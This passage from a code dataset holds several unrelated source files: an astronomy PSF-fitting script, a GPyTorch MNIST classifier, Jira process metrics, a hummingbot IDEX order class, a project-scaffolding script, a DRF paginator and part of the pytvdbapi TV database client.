pointing.dec/galsim.degrees)\n\n # Now iterate through all stars\n stardata = []\n for x,y,sky in xysky:\n x0 = int(np.floor(x+0.5))\n y0 = int(np.floor(y+0.5))\n stamp_radius = stamp_size // 2\n xmin = max(x0-stamp_radius, sci.bounds.xmin)\n xmax = min(x0-stamp_radius+stamp_size-1, sci.bounds.xmax)\n ymin = max(y0-stamp_radius, sci.bounds.ymin)\n ymax = min(y0-stamp_radius+stamp_size-1, sci.bounds.ymax)\n b = galsim.BoundsI(xmin,xmax,ymin,ymax)\n\n # Subtract sky counts, get data & weight\n stamp = sci[b] - sky\n weight = wgt[b].copy()\n\n if np.all(weight.array==0.):\n # No good pixels in a star\n if logger:\n logger.info('Discarding star at (%d,%d) with no valid pixels',x0,y0)\n continue\n # Create StarData\n props['sky'] = sky\n stardata.append(piff.StarData(stamp,\n image_pos=galsim.PositionD(x,y),\n weight=weight,\n pointing=pointing,\n properties=props.copy()))\n return stardata, sci.wcs, pointing\n\n\ndef fit_des(imagefile, catfile, order=2, nstars=None,\n scale=0.15, size=41, stamp_size=51, start_sigma=0.4,\n logger=None):\n \"\"\"\n Fit polynomial interpolated pixelized PSF to a DES image,\n using the stars in a catalog. For a single CCD.\n\n :param imagefile: Path to the image file\n :param catfile: Path to FITS SExtractor catalog holding only stars\n :param order: What order to use for the PSF interpolation [default: 2]\n :param nstars: If desired, a number fo stars to select from the full set to use.\n [default: None, which means use all stars]\n :param scale: The scale to use for the Pixel model [default: 0.15]\n :param size: The size to use for the Pixel grid [default: 41]\n :param stamp_size: The stamp size to get for the data arrays [default: 51]\n :param start_sigma: The starting sigma value for Pixel mode [default: 0.4]\n\n :returns: a completed PSF instance.\n \"\"\"\n # Get the stellar images\n if logger:\n logger.info(\"Opening FITS images\")\n ff = pyfits.open(imagefile)\n cat = pyfits.getdata(catfile,2) # ??? hard-wired extension right now\n\n if nstars is not None:\n index = np.random.choice(len(cat), size=nstars, replace=False)\n cat = cat[index]\n # ??? 
make any other object cuts here!\n\n xysky = zip(cat['XWIN_IMAGE'],cat['YWIN_IMAGE'],cat['BACKGROUND'])\n\n if logger:\n logger.info(\"Creating %d StarDatas\",len(xysky))\n original, wcs, pointing = stardata_from_fits(ff, xysky, stamp_size=stamp_size, logger=logger)\n\n if logger:\n logger.info(\"...Done making StarData\")\n\n # Add shot noise to data\n data = [s.addPoisson() for s in original]\n\n stars = [ piff.Star(d, None) for d in data ]\n\n # Make model, force PSF centering\n model = piff.PixelModel(scale=scale, size=size, interp=piff.Lanczos(3),\n force_model_center=True, start_sigma = start_sigma,\n logger=logger)\n # Interpolator will be zero-order polynomial.\n # Find u, v ranges\n u = [s['u'] for s in data]\n v = [s['v'] for s in data]\n uvrange = ( (np.min(u),np.max(u)), (np.min(v),np.max(v)) )\n interp = piff.BasisPolynomial(order, ranges=uvrange, logger=logger)\n\n\n # Make a psf\n if logger:\n logger.info(\"Building PSF\")\n wcs = {0 : wcs}\n psf = piff.PSF.build(stars, wcs, pointing, model, interp, logger=logger)\n\n # ??? Do a \"refinement\" run with the model used to generate\n # the Poisson noise instead of the signal.\n\n return psf\n\ndef subtract_stars(img, psf):\n \"\"\"Subtract modeled stars from the image.\n\n :param img: GalSim Image of a CCD\n :param psf: PSF model that has been fit to stars on this image\n\n :returns: Image with the stellar models subtracted\n \"\"\"\n for s in psf.stars:\n fitted = psf.draw(s.data, s.fit.flux, s.fit.center)\n img[fitted.image.bounds] -= fitted.image\n return img\n\ndef main():\n\n logger = piff.config.setup_logger(3)\n\n image_file = 'y1_test/DECam_00241238_01.fits.fz'\n cat_file = 'y1_test/DECam_00241238_01_psfcat_tb_maxmag_17.0_magcut_3.0_findstars.fits'\n out_file = 'output/no_stars.fits.fz'\n\n psf = fit_des(image_file, cat_file, order=2, nstars=25, scale=0.2, size=21, logger=logger)\n\n orig_image = galsim.fits.read(image_file)\n no_stars_img = subtract_stars(orig_image, psf)\n no_stars_img.write(out_file)\n\n cmd = 'ds9 -zscale -zoom 0.5 %s %s -blink interval 1 -blink'%(image_file,out_file)\n logger.warn('To open this in ds9, blinking the stars on and off, execute the command:')\n logger.warn('\\n%s\\n',cmd)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/fit_des.py","file_name":"fit_des.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167695335","text":"import math\nimport torch\nimport gpytorch\nimport matplotlib \nfrom matplotlib import pyplot as plt\n\n#torch.backends.cudnn.benchmark=True\ncuda = torch.device(\"cuda:0\") \nimport torchvision\nimport torchvision.datasets as datasets\ntorch.cuda.set_device(0)\n#torch.set_num_threads(40)\n\nmnist_trainset = datasets.MNIST(root='./data', train=True, download=False, transform=None)\nmnist_testset =datasets.MNIST(root='./data', train=False, download=False, transform=None)\ntrain_x=mnist_trainset.data[0:6000].view(-1,28*28).float()\ntrain_y=mnist_trainset.targets[0:6000]\ntrain_y=train_y\ntrain_y=train_y.float()\n\nfrom gpytorch.models import AbstractVariationalGP\nfrom gpytorch.variational import CholeskyVariationalDistribution\nfrom gpytorch.variational import VariationalStrategy\n\n\nclass GPClassificationModel(AbstractVariationalGP):\n def __init__(self, train_x):\n variational_distribution = CholeskyVariationalDistribution(train_x.size(0))\n variational_strategy = VariationalStrategy(self, train_x, variational_distribution)\n super(GPClassificationModel, 
self).__init__(variational_strategy)\n self.mean_module = gpytorch.means.ConstantMean()\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n latent_pred = gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n return latent_pred\n\n\n# Initialize model and likelihood\nmodel = GPClassificationModel(train_x)\nlikelihood = gpytorch.likelihoods.BernoulliLikelihood()\n\n\nfrom gpytorch.mlls.variational_elbo import VariationalELBO\n\n# Find optimal model hyperparameters\nmodel=model\nmodel.train()\nlikelihood.train()\n\n# Use the adam optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.1)\n\n# \"Loss\" for GPs - the marginal log likelihood\n# num_data refers to the amount of training data\nmll = VariationalELBO(likelihood, model, train_y.numel())\nwith torch.cuda.device(0):\n training_iter = 100\n for i in range(training_iter):\n for j in range(6):\n \t# Zero backpropped gradients from previous iteration\n optimizer.zero_grad()\n \t# Get predictive output\n output = model(train_x[1000*j:1000*(j+1)])\n \t# Calc loss and backprop gradients\n loss = -mll(output, train_y[1000*j:1000*(j+1)])\n loss.backward()\n print('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n optimizer.step()\n\n\n'''\ntraining_iter = 100\nfor i in range(training_iter):\n# Zero backpropped gradients from previous iteration\n\toptimizer.zero_grad()\n# Get predictive output\n\toutput = model(train_x)\n# Calc loss and backprop gradients\n\tloss = -mll(output, train_y)\n\tloss.backward()\n\tprint('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n\toptimizer.step()\n'''\n\n","sub_path":"Batches.py","file_name":"Batches.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541010210","text":"\"\"\"\nCopyright 2012-2017 Ministerie van Sociale Zaken en Werkgelegenheid\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom ... import metric_source\nfrom ...domain import HigherIsBetterMetric, LowerIsBetterMetric\n\n\nclass ReadyUserStoryPoints(HigherIsBetterMetric):\n \"\"\" Metric for measuring the number of user story points ready. \"\"\"\n\n name = 'Hoeveelheid ready user story punten'\n unit = 'ready user story punten'\n norm_template = 'Het aantal {unit} is meer dan {target}. Minder dan {low_target} {unit} is rood.'\n template = 'Het aantal {unit} is {value}.'\n target_value = 10\n low_target_value = 20\n metric_source_class = metric_source.Jira\n\n def value(self):\n nr_points = self._metric_source.nr_story_points_ready()\n return -1 if nr_points in (-1, None) else nr_points\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_ready_url()]\n\n\nclass UserStoriesWithoutAssessmentMetric(LowerIsBetterMetric):\n \"\"\" Metric for measuring the number of user stories without the proper assessment. 
\"\"\"\n norm_template = 'Het aantal {unit} is minder dan {target}. Meer dan {low_target} {unit} is rood.'\n template = 'Het aantal {unit} is {value}.'\n target_value = 1\n low_target_value = 3\n metric_source_class = metric_source.Jira\n nr_user_stories_without_risk_assessment = 'subclass responsibility'\n\n def value(self):\n nr_stories = getattr(self._metric_source, self.nr_user_stories_without_risk_assessment)()\n return -1 if nr_stories in (-1, None) else nr_stories\n\n\nclass UserStoriesWithoutSecurityRiskAssessment(UserStoriesWithoutAssessmentMetric):\n \"\"\" Metric for measuring the number of user stories without security risk assessment. \"\"\"\n\n name = 'Hoeveelheid user stories zonder security risk beoordeling'\n unit = 'user stories zonder security risk beoordeling'\n nr_user_stories_without_risk_assessment = 'nr_user_stories_without_security_risk_assessment'\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_without_security_risk_assessment_url()]\n\n\nclass UserStoriesWithoutPerformanceRiskAssessment(UserStoriesWithoutAssessmentMetric):\n \"\"\" Metric for measuring the number of user stories without performance risk assessment. \"\"\"\n\n name = 'Hoeveelheid user stories zonder performance risk beoordeling'\n unit = 'user stories zonder performance risk beoordeling'\n nr_user_stories_without_risk_assessment = 'nr_user_stories_without_performance_risk_assessment'\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_without_performance_risk_assessment_url()]\n","sub_path":"hqlib/metric/project/process_metrics.py","file_name":"process_metrics.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313090446","text":"import asyncio\n\nfrom decimal import Decimal\nfrom typing import Any, Dict\n\nfrom hummingbot.core.event.events import OrderType, TradeType\nfrom hummingbot.connector.in_flight_order_base import InFlightOrderBase\n\n\nclass IdexInFlightOrder(InFlightOrderBase):\n def __init__(self,\n client_order_id: str,\n exchange_order_id: str,\n trading_pair: str,\n order_type: OrderType,\n trade_type: TradeType,\n price: Decimal,\n amount: Decimal,\n initial_state: str = \"open\"):\n \"\"\"\n :param client_order_id:\n :param exchange_order_id:\n :param trading_pair:\n :param order_type:\n :param trade_type:\n :param price:\n :param amount:\n :param initial_state: open, partiallyFilled, filled, canceled, rejected\n \"\"\"\n super().__init__(\n client_order_id,\n exchange_order_id,\n trading_pair,\n order_type,\n trade_type,\n price,\n amount,\n initial_state,\n )\n self.fill_id_set = set()\n self.cancelled_event = asyncio.Event()\n\n @property\n def is_done(self) -> bool:\n return self.last_state in {\"filled\", \"canceled\", \"rejected\"}\n\n @property\n def is_failure(self) -> bool:\n return self.last_state in {\"rejected\", }\n\n @property\n def is_cancelled(self) -> bool:\n return self.last_state in {\"canceled\", \"cancelled\"}\n\n @classmethod\n def from_json(cls, data: Dict[str, Any]) -> InFlightOrderBase:\n \"\"\"\n :param data: json data from API\n :return: formatted InFlightOrder\n \"\"\"\n result = IdexInFlightOrder(\n data[\"client_order_id\"],\n data[\"exchange_order_id\"],\n data[\"trading_pair\"],\n getattr(OrderType, data[\"order_type\"]),\n getattr(TradeType, data[\"trade_type\"]),\n Decimal(data[\"price\"]),\n Decimal(data[\"amount\"]),\n data[\"last_state\"]\n )\n result.executed_amount_base = 
Decimal(data[\"executed_amount_base\"])\n result.executed_amount_quote = Decimal(data[\"executed_amount_quote\"])\n result.fee_asset = data[\"fee_asset\"]\n result.fee_paid = Decimal(data[\"fee_paid\"])\n result.last_state = data[\"last_state\"]\n return result\n\n def update_with_fill_update(self, fill_update: Dict[str, Any]) -> bool:\n \"\"\"\n Updates the in flight order with fill update (from private/get-order-detail end point)\n return: True if the order gets updated otherwise False\n \"\"\"\n fill_id = fill_update[\"i\"] if \"i\" in fill_update else fill_update.get(\"i\")\n if fill_id in self.fill_id_set:\n # fill already recorded\n return False\n self.fill_id_set.add(fill_id)\n self.executed_amount_base += Decimal(str(fill_update[\"q\"] if \"q\" in fill_update else\n fill_update.get(\"quantity\")))\n self.fee_paid += Decimal(str(fill_update[\"f\"] if \"f\" in fill_update else fill_update.get(\"fee\")))\n self.executed_amount_quote += (\n Decimal(str(fill_update[\"p\"] if \"p\" in fill_update else fill_update.get(\"price\"))) * Decimal(\n str(fill_update[\"q\"] if \"q\" in fill_update else fill_update.get(\"quantity\")))\n )\n if not self.fee_asset:\n self.fee_asset = fill_update[\"a\"] if \"a\" in fill_update else fill_update.get(\"feeAsset\")\n return True\n","sub_path":"hummingbot/connector/exchange/idex/idex_in_flight_order.py","file_name":"idex_in_flight_order.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"200319157","text":"# Python program to demonstrate \n# command line arguments \n\nimport sys \nimport os\nimport os.path\nfrom os import path\nfrom shutil import copyfile\nimport subprocess\nfrom subprocess import call\n \n# total arguments \nn = len(sys.argv) \n\nif n<2:\n print(\"Usage : python3 generateNewProject.pl \")\n exit()\n\nprojectName = sys.argv[1]\nprojectPath = \"../../Applications/\"+sys.argv[1]\n\nif path.exists(projectPath):\n print(projectName + \" already exists\")\n exit()\n\nprint(\"Creating project : \"+projectName)\nos.mkdir(projectPath)\nos.mkdir(projectPath+\"/build\")\nos.mkdir(projectPath+\"/src\")\nos.mkdir(projectPath+\"/include\")\nos.mkdir(projectPath+\"/configs\")\ncopyfile(\"CMakeLists_template.txt\", projectPath+\"/CMakeLists.txt\")\ncopyfile(\"main_template.c\", projectPath+\"/src/main.c\")\ncopyfile(\"Kconfig_template\", projectPath+\"/Kconfig\")\ngenerateCommand = \"bash generateForSingleProject.sh \"+projectName\ncall(generateCommand,shell=True)\nsedCmd = \"sed -i \\'s/Task_Name_placeholder/\"+projectName+\"/g\\' \"+ projectPath+\"/src/main.c\"\ncall(sedCmd,shell=True)","sub_path":"Tools/SEGGER/generateNewProject.py","file_name":"generateNewProject.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158718057","text":"from rest_framework import pagination\nfrom rest_framework.response import Response\n\n\nclass CustomPagination(pagination.PageNumberPagination):\n def get_paginated_response(self, data):\n return Response({\n 'results': data,\n 'pagination': {\n 'num_results': self.page.paginator.count,\n 'num_pages': self.page.paginator.num_pages,\n 'display_page_controls': self.display_page_controls,\n 'page_current': self.page.number,\n 'page_size': self.page_size,\n 'next_url': self.get_next_link(),\n 'previous_url': self.get_previous_link()\n }\n 
})\n","sub_path":"rodgal/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135744843","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2011 - 2013 Björn Larsson\n\n# This file is part of pytvdbapi.\n#\n# pytvdbapi is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# pytvdbapi is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with pytvdbapi. If not, see .\n\n\"\"\"\nThis is the main module for **pytvdbapi** intended for client usage. It contains functions to access the\nAPI functionality through the :class:`TVDB` class and its methods. It has implementations for\nrepresentations of :class:`Show`, :class:`Season` and :class:`Episode` objects.\n\nIt also contains functionality to access the list of API supported languages through the :func:`languages`\nfunction.\n\nBasic usage::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"How I met your mother\", \"en\")\n >>> len(result)\n 1\n\n >>> show = result[0] # If there is a perfect match, it will be the first\n >>> print(show.SeriesName)\n How I Met Your Mother\n\n >>> len(show) # Show the number of seasons\n 10\n\n >>> for season in show: #doctest: +ELLIPSIS\n ... for episode in season:\n ... 
print(episode.EpisodeName)\n ...\n Robin Sparkles Music Video - Let's Go to the Mall\n Robin Sparkles Music Video - Sandcastles In the Sand\n ...\n Pilot\n Purple Giraffe\n Sweet Taste of Liberty\n Return of the Shirt\n ...\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport logging\nimport tempfile\nimport os\nfrom collections import Sequence\n\n# pylint: disable=E0611, F0401, W0622\nfrom pytvdbapi.actor import Actor\nfrom pytvdbapi.banner import Banner\nfrom pytvdbapi.utils import InsensitiveDictionary, unicode_arguments\nfrom pytvdbapi._compat import implements_to_string, make_bytes, make_unicode\n\ntry:\n from urllib import quote\nexcept ImportError:\n from urllib.parse import quote\n\n# pylint: enable=E0611, F0401\n\nfrom pytvdbapi import error\nfrom pytvdbapi.__init__ import __NAME__\nfrom pytvdbapi.loader import Loader\nfrom pytvdbapi.mirror import MirrorList, TypeMask\nfrom pytvdbapi.utils import merge\nfrom pytvdbapi.xmlhelpers import parse_xml, generate_tree\n\n# URL templates used for loading the data from thetvdb.com\n__mirrors__ = u\"http://www.thetvdb.com/api/{api_key}/mirrors.xml\"\n__time__ = u\"http://www.thetvdb.com/api/Updates.php?type=none\"\n__search__ = u\"http://www.thetvdb.com/api/GetSeries.php?seriesname={series}&language={language}\"\n__series__ = u\"{mirror}/api/{api_key}/series/{seriesid}/all/{language}.xml\"\n__episode__ = u\"{mirror}/api/{api_key}/episodes/{episodeid}/{language}.xml\"\n__actors__ = u\"{mirror}/api/{api_key}/series/{seriesid}/actors.xml\"\n__banners__ = u\"{mirror}/api/{api_key}/series/{seriesid}/banners.xml\"\n\n__all__ = ['languages', 'Language', 'TVDB', 'Search', 'Show', 'Season', 'Episode']\n\n# Module logger object\nlogger = logging.getLogger(__name__)\n\n\n@implements_to_string\nclass Language(object):\n \"\"\"\n Representing a language that is supported by the API.\n\n .. seealso:: :func:`TVDB.get_series`, :func:`TVDB.get_episode` and :func:`TVDB.search` for functions\n where the language can be specified.\n \"\"\"\n\n def __init__(self, abbrev, name, id):\n #: A two letter abbreviation representing the language, e.g. 
*en*.\n        #: This is what should be passed when specifying a language to the API.\n        self.abbreviation = abbrev\n\n        #: The localised name of the language.\n        self.name = name\n\n        self._id = id\n\n    def __str__(self):\n        return u'<{0} - {1}({2})>'.format(self.__class__.__name__, self.name, self.abbreviation)\n\n    def __repr__(self):\n        return self.__str__()\n\n# The list of API supported languages\n__LANGUAGES__ = {u\"da\": Language(abbrev=u\"da\", name=u\"Dansk\", id=10),\n                 u\"fi\": Language(abbrev=u\"fi\", name=u\"Suomeksi\", id=11),\n                 u\"nl\": Language(abbrev=u\"nl\", name=u\"Nederlands\", id=13),\n                 u\"de\": Language(abbrev=u\"de\", name=u\"Deutsch\", id=14),\n                 u\"it\": Language(abbrev=u\"it\", name=u\"Italiano\", id=15),\n                 u\"es\": Language(abbrev=u\"es\", name=u\"Español\", id=16),\n                 u\"fr\": Language(abbrev=u\"fr\", name=u\"Français\", id=17),\n                 u\"pl\": Language(abbrev=u\"pl\", name=u\"Polski\", id=18),\n                 u\"hu\": Language(abbrev=u\"hu\", name=u\"Magyar\", id=19),\n                 u\"el\": Language(abbrev=u\"el\", name=u\"Ελληνικά\", id=20),\n                 u\"tr\": Language(abbrev=u\"tr\", name=u\"Türkçe\", id=21),\n                 u\"ru\": Language(abbrev=u\"ru\", name=u\"русский язык\", id=22),\n                 u\"he\": Language(abbrev=u\"he\", name=u\" עברית\", id=24),\n                 u\"ja\": Language(abbrev=u\"ja\", name=u\"日本語\", id=25),\n                 u\"pt\": Language(abbrev=u\"pt\", name=u\"Português\", id=26),\n                 u\"zh\": Language(abbrev=u\"zh\", name=u\"中文\", id=27),\n                 u\"cs\": Language(abbrev=u\"cs\", name=u\"čeština\", id=28),\n                 u\"sl\": Language(abbrev=u\"sl\", name=u\"Slovenski\", id=30),\n                 u\"hr\": Language(abbrev=u\"hr\", name=u\"Hrvatski\", id=31),\n                 u\"ko\": Language(abbrev=u\"ko\", name=u\"한국어\", id=32),\n                 u\"en\": Language(abbrev=u\"en\", name=u\"English\", id=7),\n                 u\"sv\": Language(abbrev=u\"sv\", name=u\"Svenska\", id=8),\n                 u\"no\": Language(abbrev=u\"no\", name=u\"Norsk\", id=9)}\n\n\ndef languages():\n    \"\"\"\n    :return: A list of :class:`Language` objects\n\n    Returns the list of all API supported languages.\n\n    Example::\n\n        >>> from pytvdbapi import api\n        >>> for language in api.languages(): #doctest: +ELLIPSIS\n        ...     print(language)\n        <Language - čeština(cs)>\n        <Language - Dansk(da)>\n        <Language - Deutsch(de)>\n        ...\n        <Language - English(en)>\n        ...\n        <Language - Svenska(sv)>\n        ...\n    \"\"\"\n    return sorted([lang for lang in __LANGUAGES__.values()], key=lambda l: l.abbreviation)\n\n\n@implements_to_string\nclass Episode(object):\n    \"\"\"\n    :raise: :exc:`pytvdbapi.error.TVDBAttributeError`\n\n    Holds all information about an individual episode. This should be treated\n    as a read-only object to obtain the attributes of the episode.\n\n    All episode values returned from thetvdb.com_ are\n    accessible as attributes of the episode object.\n    TVDBAttributeError will be raised if accessing an invalid attribute. Some\n    type conversions of the attributes will take place as follows:\n\n    * Strings of the format yyyy-mm-dd will be converted into a\\\n        :class:`datetime.date` object.\n    * Pipe separated strings will be converted into a list. 
E.g \"foo | bar\" =>\\\n [\"foo\", \"bar\"]\n * Numbers with a decimal point will be converted to float\n * A number will be converted into an int\n\n\n It is possible to obtain the containing season through the *Episode.season*\n attribute.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"Dexter\", \"en\")\n >>> show = result[0]\n >>> episode = show[1][2] # Get episode S01E02\n\n >>> print(episode.season)\n \n\n >>> print(episode.EpisodeNumber)\n 2\n\n >>> print(episode.EpisodeName)\n Crocodile\n\n >>> episode.FirstAired\n datetime.date(2006, 10, 8)\n\n >>> dir(episode) #doctest: +NORMALIZE_WHITESPACE\n ['Combined_episodenumber',\n 'Combined_season', 'DVD_chapter', 'DVD_discid', 'DVD_episodenumber',\n 'DVD_season', 'Director', 'EpImgFlag', 'EpisodeName', 'EpisodeNumber',\n 'FirstAired', 'GuestStars', 'IMDB_ID', 'Language', 'Overview',\n 'ProductionCode', 'Rating', 'RatingCount', 'SeasonNumber', 'Writer',\n 'absolute_number', 'filename', 'id', 'lastupdated', 'season',\n 'seasonid', 'seriesid', 'thumb_added', 'thumb_height', 'thumb_width']\n\n .. _thetvdb.com: http://thetvdb.com\n \"\"\"\n\n data = {}\n\n def __init__(self, data, season, config):\n self.season, self.config = season, config\n ignore_case = self.config.get('ignore_case', False)\n\n self.data = InsensitiveDictionary(ignore_case=ignore_case, **data) # pylint: disable=W0142\n\n def __getattr__(self, item):\n try:\n return self.data[item]\n except KeyError:\n raise error.TVDBAttributeError(u\"Episode has no attribute {0}\".format(item))\n\n def __dir__(self):\n attributes = [d for d in list(self.__dict__.keys()) if d not in ('data', 'config')]\n return list(self.data.keys()) + attributes\n\n def __str__(self):\n return u'<{0} - S{1:03d}E{2:03d}>'.format(\n self.__class__.__name__, self.SeasonNumber, self.EpisodeNumber)\n\n def __repr__(self):\n return self.__str__()\n\n\n@implements_to_string\nclass Season(Sequence):\n # pylint: disable=R0924\n \"\"\"\n :raise: :exc:`pytvdbapi.error.TVDBIndexError`\n\n Holds all the episodes that belong to a specific season. It is possible\n to iterate over the Season to obtain the individual :class:`Episode`\n instances. It is also possible to obtain an individual episode using the\n [ ] syntax. It will raise :class:`pytvdbapi.error.TVDBIndexError` if trying\n to index an invalid episode index.\n\n It is possible to obtain the containing :class:`Show` instance through the\n *Season.show* attribute.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"Dexter\", \"en\")\n >>> show = result[0]\n\n >>> season = show[2]\n >>> len(season) # Number of episodes in the season\n 12\n\n >>> print(season.season_number)\n 2\n\n >>> print(season[2].EpisodeName)\n Waiting to Exhale\n\n >>> for episode in season: #doctest: +ELLIPSIS\n ... 
print(episode.EpisodeName)\n        ...\n        It's Alive!\n        Waiting to Exhale\n        An Inconvenient Lie\n        See-Through\n        ...\n        Left Turn Ahead\n        The British Invasion\n    \"\"\"\n\n    def __init__(self, season_number, show):\n        self.show, self.season_number = show, season_number\n        self.episodes = dict()\n\n    def __getitem__(self, item):\n        if isinstance(item, int):\n            try:\n                return self.episodes[item]\n            except KeyError:\n                raise error.TVDBIndexError(u\"Episode {0} not found\".format(item))\n\n        elif isinstance(item, slice):\n            indices = sorted(self.episodes.keys())[item]  # Slice the keys\n            return [self[i] for i in indices]\n        else:\n            raise error.TVDBValueError(u\"Index should be an integer\")\n\n    def __dir__(self):  # pylint: disable=R0201\n        return ['show', 'season_number']\n\n    def __reversed__(self):\n        for i in sorted(self.episodes.keys(), reverse=True):\n            yield self[i]\n\n    def __len__(self):\n        return len(self.episodes)\n\n    def __iter__(self):\n        return iter(sorted(list(self.episodes.values()), key=lambda ep: ep.EpisodeNumber))\n\n    def __str__(self):\n        return u'<Season {0:03}>'.format(self.season_number)\n\n    def __repr__(self):\n        return self.__str__()\n\n    def append(self, episode):\n        \"\"\"\n        :param episode: The episode to append\n        :type episode: :class:`Episode`\n\n        Adds a new :class:`Episode` to the season. If an episode with the same\n        EpisodeNumber already exists, it will be overwritten.\n        \"\"\"\n        assert type(episode) in (Episode,)\n        logger.debug(u\"{0} adding episode {1}\".format(self, episode))\n\n        self.episodes[int(episode.EpisodeNumber)] = episode\n\n\n@implements_to_string\nclass Show(Sequence):\n    # pylint: disable=R0924, R0902\n    \"\"\"\n    :raise: :exc:`pytvdbapi.error.TVDBAttributeError`, :exc:`pytvdbapi.error.TVDBIndexError`\n\n    Holds attributes about a single show and contains all seasons associated\n    with a show. The attributes are named exactly as returned from\n    thetvdb.com_. This object should be considered a read only container of\n    data provided from the server. Some type conversion of the attributes\n    will take place as follows:\n\n    * Strings of the format yyyy-mm-dd will be converted into a\\\n        :class:`datetime.date` object.\n    * Pipe separated strings will be converted into a list. E.g \"foo | bar\" =>\\\n        [\"foo\", \"bar\"]\n    * Numbers with a decimal point will be converted to float\n    * A number will be converted into an int\n\n\n    The Show uses lazy evaluation and will only load the full data set from\n    the server when this data is needed. This is to speed up the searches and\n    to reduce the workload of the servers. This way,\n    data will only be loaded when actually needed.\n\n    The Show supports iteration to iterate over the Seasons contained in the\n    Show. 
You can also index individual seasons with the [ ] syntax.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"dexter\", \"en\")\n >>> show = result[0]\n\n >>> dir(show) # List the set of basic attributes # doctest: +NORMALIZE_WHITESPACE\n ['AliasNames', 'FirstAired', 'IMDB_ID', 'Network',\n 'Overview', 'SeriesName', 'actor_objects', 'api',\n 'banner', 'banner_objects', 'id', 'lang', 'language',\n 'seriesid', 'zap2it_id']\n\n >>> show.update() # Load the full data set from the server\n >>> dir(show) # List the full set of attributes # doctest: +NORMALIZE_WHITESPACE\n ['Actors', 'Airs_DayOfWeek', 'Airs_Time', 'AliasNames',\n 'ContentRating', 'FirstAired', 'Genre', 'IMDB_ID', 'Language',\n 'Network', 'NetworkID', 'Overview', 'Rating', 'RatingCount', 'Runtime',\n 'SeriesID', 'SeriesName', 'Status', 'actor_objects', 'added', 'addedBy',\n 'api', 'banner', 'banner_objects', 'fanart', 'id', 'lang', 'language',\n 'lastupdated', 'poster', 'seriesid', 'zap2it_id']\n\n .. note:: When searching, thetvdb.com_ provides a basic set of attributes\n for the show. When the full data set is loaded thetvdb.com_ provides a\n complete set of attributes for the show. The full data set is loaded\n when accessing the season data of the show. If you need access to the\n full set of attributes you can force the loading of the full data set\n by calling the :func:`update()` function.\n\n .. _thetvdb.com: http://thetvdb.com\n \"\"\"\n\n data = {}\n\n def __init__(self, data, api, language, config):\n self.api, self.lang, self.config = api, language, config\n self.seasons = dict()\n\n self.ignore_case = self.config.get('ignore_case', False)\n self.data = InsensitiveDictionary(ignore_case=self.ignore_case, **data) # pylint: disable=W0142\n\n self.data['actor_objects'] = list()\n self.data['banner_objects'] = list()\n\n def __getattr__(self, item):\n try:\n return self.data[item]\n except KeyError:\n raise error.TVDBAttributeError(u\"Show has no attribute named {0}\".format(item))\n\n def __dir__(self):\n attributes = [d for d in list(self.__dict__.keys())\n if d not in ('data', 'config', 'ignore_case', 'seasons')]\n return list(self.data.keys()) + attributes\n\n def __iter__(self):\n if not self.seasons:\n self._populate_data()\n\n return iter(sorted(list(self.seasons.values()), key=lambda season: season.season_number))\n\n def __len__(self):\n if not len(self.seasons):\n self._populate_data()\n\n return len(self.seasons)\n\n def __reversed__(self):\n for i in sorted(self.seasons.keys(), reverse=True):\n yield self[i]\n\n def __getitem__(self, item):\n if len(self.seasons) == 0:\n self._populate_data()\n\n if isinstance(item, int):\n try:\n return self.seasons[item]\n except KeyError:\n raise error.TVDBIndexError(u\"Season {0} not found\".format(item))\n\n elif isinstance(item, slice):\n indices = sorted(self.seasons.keys())[item] # Slice the keys\n return [self[i] for i in indices]\n else:\n raise 